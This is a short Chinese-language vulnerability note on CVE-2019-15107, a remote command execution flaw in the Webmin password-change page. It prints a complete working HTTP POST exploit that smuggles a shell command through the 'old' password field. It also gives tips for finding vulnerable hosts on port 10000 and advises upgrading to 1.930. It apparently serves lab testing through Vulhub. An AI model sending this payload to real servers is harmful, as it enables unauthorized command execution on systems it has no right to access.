漏洞编号
CVE-2019-15107
漏洞描述
Webmin是一个基于Web的系统配置工具,用于类Unix系统。密码重置页面中存在此漏洞,允许未经身份验证的用户通过简单的 POST 请求执行任意命令。
影响版本
Webmin<=1.920
漏洞评级
严重
利用方法(利用案例)
参考链接:https://vulhub.org/#/environments/webmin/CVE-2019-15107/
构造payload
POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2
直接利用payload即可
漏洞挖掘
可以根据网站指纹信息
10000是这个系统的默认端口,在目标网站访问这个url:/password_change.cgi
加固建议
升级到1.930版本
漏洞分类
远程代码执行漏洞
参考链接
Vulhub - 用于漏洞环境的 Docker-Compose 文件